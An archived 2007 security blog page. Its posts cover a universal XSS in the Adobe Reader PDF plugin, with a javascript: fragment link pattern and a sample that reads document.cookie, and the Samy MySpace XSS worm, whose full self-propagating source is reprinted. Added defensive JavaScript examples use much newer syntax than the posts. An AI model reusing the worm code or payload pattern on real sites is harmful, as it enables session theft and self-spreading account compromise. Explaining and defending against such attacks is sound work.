On this page

A White-Hat hacker - moral issues
Israeli Bloggers dinner - 21.02.07
A new blog on the web.
PDF document - vulnerability out of the box.
An XSS worm - Historic event
document.cookie - Different behavior in IE7
A White-Hat hacker - moral issues
Tuesday, February 20, 2007 7:50:27 AM (GMT Standard Time, UTC+00:00) ( Life | Security )
OK, I'm facing a dilemma here.
Many of the site checks I've done returned positive results for security holes.
Now, the question is: what do I do next with this info?

The obvious options are:
•    Not do anything with this info.
•    Write a full technical report regarding the security holes found around the web (maybe a video demo?).
•    Open a security site that holds data about security vulnerabilities.
•    Provide some demos of the hack.
•    Report the problem to the sites that have it.
•    Try to make money off it? (This option is more suited to a black hat hacker...)
•    Obtain the reputation of a web security expert by exposing the security holes?
I remind you that there can be consequences for the actions taken (jail is not my favorite option...)

What do you think I should do?
Please comment here...

Your opinion is very important to me.
Comments [7]
Israeli Bloggers dinner - 21.02.07
Friday, February 16, 2007 1:58:59 PM (GMT Standard Time, UTC+00:00) ( Blog related )
If you haven't been to such an event, and you match the criteria (an Israeli blogger...):
I haven't been to one of those either, but judging by the comments on the last event (the previous dinner), this event is something you want to be at.

Check out the organizer's post: http://blogs.microsoft.co.il/blogs/omer/archive/2007/02/13/8020.aspx

Comments [0]
A new blog on the web.
Sunday, February 11, 2007 10:06:31 AM (GMT Standard Time, UTC+00:00) ( @ff Topic | Blog related )

A new blog surfaced in the last few days. This one is from Doron Yaacoby.

This dude knows what he's talking about. I would strongly recommend paying this guy a visit.

Comments [2]
PDF document - vulnerability out of the box.
Friday, February 09, 2007 7:12:20 PM (GMT Standard Time, UTC+00:00) ( Security | XSS )

Sounds controversial, right? Well, it is.

Actually, under certain conditions you can execute JavaScript on the client's machine using a PDF file, and the funny part is that the PDF itself does not need to be modified at all.

Simply create a link with this pattern:

http://yoursite.com/file.pdf#whatever_name_you_want=javascript:your_code_here

There is XSS written all over the place: the script runs in the origin of the site that hosts the PDF, with access to that site's cookies and DOM. The sad part is that the site owners can do very little to prevent it. Everything after the # is a URL fragment, which the browser never sends to the server, so no server-side input filtering can see the payload. The site-side workaround known at the time was to stop the browser plugin from rendering PDFs inline, for example by serving them with Content-Disposition: attachment so they are downloaded instead.
This works with:

Firefox 2.0.0.1 win32
Firefox 1.5.0.8 win32
Opera 8.5.4 build 770 win32
Opera 9.10.8679 win32

and I'm sure it works with other browsers too. The bug is in the Adobe Reader browser plugin (Adobe's bulletin covers Reader and Acrobat 7.0.8 and earlier), so the Reader version matters more than the browser.

The subject was brought to Adobe's attention:
http://www.adobe.com/support/security/advisories/apsa07-01.html
Adobe categorizes this as a critical issue and recommends that affected users update any affected software:
http://www.adobe.com/support/security/bulletins/apsb07-01.html

How does this work? (And why?)

The Reader plugin accepts "open parameters" in the URL fragment (the same mechanism that lets a link open a PDF at #page=3). The odd thing is that the vulnerable plugin handed parameter values back to the browser as URLs to load, so a value of the form javascript:... was executed, and because the plugin runs inside the page that served the PDF, the script ran in that site's origin like any other XSS.

More info can be found on these sites:
http://ha.ckers.org/blog/20070103/universal-xss-in-pdfs/
http://www.gnucitizen.org/blog/danger-danger-danger/

Be careful when you open a PDF file next time.
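To make the point above concrete, here is an added example written for this page; it is not code from the post, from Adobe, or from the linked write-ups. It parses a fragment into open parameters the way the write-ups describe the plugin doing it, shows that the same URL reaches the server with the fragment stripped, and builds the Content-Disposition header a site could use to keep PDFs out of the plugin. The splitting rule, the function names and the sample link are assumptions.

```javascript
// Added example, not code from the post or from Adobe: it shows how a payload
// carried in the URL fragment looks to the browser-side plugin versus the
// server, and the header a site could send to keep PDFs out of the plugin.
// Assumption: the plugin splits the fragment on '&' and '=' like a query
// string, which is how the public write-ups describe Acrobat open parameters.

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Parse "#name=value&name2=value2" into an object. Only the first '='
// separates key from value, so "k=javascript:x=1" keeps its value intact.
function parseOpenParams(urlString) {
  const hash = new URL(urlString).hash;
  const fragment = hash.startsWith('#') ? hash.slice(1) : hash;
  const params = {};
  if (fragment === '') return params;
  for (const pair of fragment.split('&')) {
    const idx = pair.indexOf('=');
    const key = idx === -1 ? pair : pair.slice(0, idx);
    const value = idx === -1 ? '' : pair.slice(idx + 1);
    params[safeDecode(key)] = safeDecode(value);
  }
  return params;
}

// True if any parameter value is a javascript: URL. Leading whitespace and
// control characters are stripped first, because browsers ignore them when
// resolving a scheme name.
function hasScriptPayload(params) {
  return Object.values(params).some(v =>
    /^javascript:/i.test(v.replace(/^[\s\x00-\x1f]+/, '')));
}

// What the web server actually receives: the fragment is removed by the
// browser before the request is sent, so server-side filtering never sees it.
function requestTargetSeenByServer(urlString) {
  const url = new URL(urlString);
  return url.pathname + url.search;
}

// Everything a site or a proxy can decide about a link, in one place.
function classifyPdfLink(urlString) {
  const params = parseOpenParams(urlString);
  return {
    seenByServer: requestTargetSeenByServer(urlString),
    params,
    suspicious: hasScriptPayload(params),
  };
}

// Site-side workaround from the time of the advisory: force the file to be
// downloaded instead of rendered inline by the Reader plugin, so whatever is
// in the fragment is never interpreted in this site's origin.
function pdfResponseHeaders(filename) {
  const safeName = filename.replace(/[^\w.-]/g, '_'); // no quotes or path parts in the header
  return {
    'Content-Type': 'application/pdf',
    'Content-Disposition': `attachment; filename="${safeName}"`,
  };
}

// Constructed sample link following the pattern from the post.
const SAMPLE = 'http://yoursite.com/file.pdf#whatever_name_you_want=javascript:alert(document.cookie)';
console.log(classifyPdfLink(SAMPLE));
console.log(pdfResponseHeaders('file.pdf'));
```

The interesting output is `seenByServer`: it is just `/file.pdf`, which is why a web application firewall or an input filter on the server can never catch this class of link, and why the fix had to come from the plugin (or from not rendering PDFs inline at all).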

Comments [0]
An XSS worm - Historic event
Friday, February 09, 2007 6:09:55 PM (GMT Standard Time, UTC+00:00) ( Security | XSS )

OK, maybe this is not something new, but it is definitely not something common.

If you haven't read my post on XSS prevention, please do so.

The story begins on October 4, 2005, when Samy decided to get popular on MySpace. He exploited the fact that MySpace let users put HTML and CSS on their profile page and only tried to blacklist JavaScript; the worm slipped past that filter with tricks you can see in the code below, such as splitting the word "javascript" with a newline inside a CSS url() and assembling strings like 'inne'+'rHTML' at run time.

So the dude explored the MySpace system and crafted a script that adds himself to the viewer's friend list, appends "but most of all, samy is my hero" to the viewer's heroes section, and copies itself into the viewer's profile along the way. Technically a single injected script is not a worm, but the replication of the code to each viewer's page qualifies it as one.

Here is the code of the worm:

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')"
expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var 
AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

 

An explanation of the code can be found here.
This shows several things:

  • XSS can be exploited for major attacks, even for personal gain.
  • XSS is easy to underestimate.

Please don't underestimate it; this could do some major damage to your application.

To prove my point I will include a demo in the next security post (session hijacking prevention).
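To show why the blacklist approach the worm defeated is the wrong tool, here is an added example, not MySpace's filter and not part of the worm. It runs two constructed snippets that use the worm's own evasions (the newline inside "javascript" and the 'inne'+'rHTML' concatenation) through a naive word blacklist, then through a whitespace-normalising scheme detector, and finally through an allow-list sanitizer that keeps only named tags and attributes. The allowed tags and attributes, the function names and the sample profile markup are my own illustrative choices.

```javascript
// Added example, not MySpace's filter and not part of the worm: why the
// blacklist-style filtering the worm slipped past is the wrong tool, and what
// an allow-list sanitizer does instead. The tag/attribute lists are my own
// illustrative choices, not MySpace's.

// A naive blacklist of the kind the worm's tricks were written to evade.
function naiveBlacklistPasses(html) {
  const banned = ['javascript', 'innerHTML', '<script', 'onload'];
  return !banned.some(word => html.includes(word));
}

// Two constructed snippets using evasions taken from the worm above: a newline
// inside "javascript" (browsers of the era still honoured the scheme inside a
// CSS url()), and a property name assembled at run time ('inne'+'rHTML').
const SPLIT_SCHEME = "<div style=\"background:url('java\nscript:alert(1)')\">";
const CONCAT_PROP = "<div expr=\"eval('document.body.inne'+'rHTML')\">";

// Strip whitespace and control characters before looking for a scheme, so
// the split-word trick no longer hides it.
function normalise(s) {
  return s.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
}
function containsScriptScheme(html) {
  return /(javascript|vbscript):/.test(normalise(html));
}

// Allow-list sanitizer: only these tags survive, only these attributes on
// them, and href must resolve to http(s). style, expr and on* never get
// through because they are simply not on the list.
const ALLOWED = { b: [], i: [], p: [], br: [], div: [], a: ['href'] };
const ATTR_RE = /([a-zA-Z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function sanitizeProfileHtml(html) {
  return html.replace(/<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g, (tag, slash, name, attrs) => {
    const lower = name.toLowerCase();
    // hasOwnProperty, not `in`, so a tag named <constructor> cannot reach the prototype.
    if (!Object.prototype.hasOwnProperty.call(ALLOWED, lower)) return escapeHtml(tag);
    if (slash) return `</${lower}>`;
    const kept = [];
    let m;
    ATTR_RE.lastIndex = 0;
    while ((m = ATTR_RE.exec(attrs)) !== null) {
      const attr = m[1].toLowerCase();
      const value = m[2] ?? m[3] ?? m[4] ?? '';
      if (!ALLOWED[lower].includes(attr)) continue;                       // drop style, expr, on*, ...
      if (attr === 'href' && !/^https?:\/\//.test(normalise(value))) continue; // drop javascript: links
      kept.push(` ${attr}="${escapeHtml(value)}"`);
    }
    return `<${lower}${kept.join('')}>`;
  });
}

// Constructed profile snippet: benign markup plus the two evasions.
const PROFILE = '<b>hi</b> ' + SPLIT_SCHEME + 'x</div>' + CONCAT_PROP + '</div>' +
  '<a href="http://samy.pl/">samy</a>';
console.log(naiveBlacklistPasses(PROFILE));   // the blacklist lets it through
console.log(containsScriptScheme(PROFILE));   // normalising first catches the scheme
console.log(sanitizeProfileHtml(PROFILE));    // the allow-list never emits style/expr at all
```

The detector is only a safety net: it catches the split scheme but not the concatenated property name, because there is no keyword left to match. The allow-list sanitizer does not need to recognise either trick; it simply never emits an attribute it was not told about, which is the property a profile-page filter needs.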

Comments [0]
document.cookie - Different behavior in IE7
Saturday, February 03, 2007 6:23:50 PM (GMT Standard Time, UTC+00:00) ( Internet Explorer )

Today I was hoping to finish my "Session hijacking prevention" presentation, so I thought that recording a live demo would be nice.

And then (by mistake...) I discovered that document.cookie will give you an empty string on Internet Explorer 7. Nevertheless it works fine on previous versions of Explorer and on Firefox.

Did Microsoft restrict access to cookies via JavaScript in IE7?

Comments [4]